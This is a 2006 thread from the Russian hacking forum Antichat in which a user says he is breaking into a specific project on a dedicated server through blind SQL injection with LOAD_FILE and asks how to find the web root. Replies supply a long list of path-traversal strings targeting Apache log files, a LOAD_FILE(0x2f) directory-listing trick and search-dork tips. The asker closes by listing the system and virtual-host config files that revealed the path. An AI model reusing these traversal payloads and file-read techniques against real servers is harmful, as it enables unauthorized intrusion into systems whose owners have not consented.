Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   путь к Document_root (https://forum.antichat.xyz/showthread.php?t=29679)

LAMAREZ 23.12.2006 06:18
путь к Document_root
 
блинк скуль есть с лоад файлом...
как разкрыть путь к DOCUMENT_ROOT?
/etc/httpd/conf/httpd.conf - безпонтово... никакой инфы по этому поводу...

blackybr 23.12.2006 12:51
Гуглить на тему

ERROR site:microsoft.com
MYSQL site:microsoft.com

пробовал ?)

если есть доступ к конфигу, значит есть и локал инклуд? если да.. то логи, vhosts если есть или конфы различных панелек
Код:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
и тд )

guest3297 23.12.2006 15:27
Если вывод ошибок вообще выключен... то искать другие баги бесполезно... сойдет любой баг на раскрытие пути...потыркать на info.php php.php phpinfo.php и так далее посмотреть те сайты которые рядом найти багу на расурытие пути проанализировать применить в своем случаем искать конфиги... через лоад файл иногда работает листинг директорий.
LOAD_FILE(0x2f)

LAMAREZ 23.12.2006 17:29
нах ты эту гунь пишешь? ))
я про ../
Цитата:
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
так написал бы и всё =\

zl0ba 23.12.2006 18:14
Цитата:
Сообщение от [ cash ]
посмотреть те сайты которые рядом найти багу на расурытие пути проанализировать применить в своем случаем искать конфиги...
Кэш правильно сказал и вот тебе к нагрузке http://www.domainsdb.net/ юзай!

LAMAREZ 23.12.2006 18:37
лол... ничего толком не помогли...
какой нах домайнсдб?
я ломаю конкретный проэкт на выделеном сервера, а вы мне про domainsdb сказки росказуете...
апач так настроен что ошибки не светит...
мне нада узанть путь через локальный инклуд... написал же чётко LOAD_FILE...

DIAgen 23.12.2006 18:46
Цитата:
Сообщение от LAMAREZ
лол... ничего толком не помогли...
какой нах домайнсдб?
я ломаю конкретный проэкт на выделеном сервера, а вы мне про domainsdb сказки росказуете...
апач так настроен что ошибки не светит...
мне нада узанть путь через локальный инклуд... написал же чётко LOAD_FILE...
Да не как ты не узнаешь, если только осталось в кэше www.google.com путь при отладки скриптов, а так обломись!

blackybr 23.12.2006 22:11
Lamarez как собирал так и дал )))

LAMAREZ 24.12.2006 05:57
хаха...
никто и не заикнулся про:
(вот как я добился истины)
1) /etc/rc.d/rc
2) /etc/rc.d/rc.local
3) /etc/mathopd/mathopd.conf
4) /var/run/httpd.pid
5) /etc/apache/conf/virtual-monster.conf - тут хосты
6) /etc/apache/conf/virtual.conf - и тут хосты

эх вы...))
как говорится "с миру по нитке..."


Время: 22:29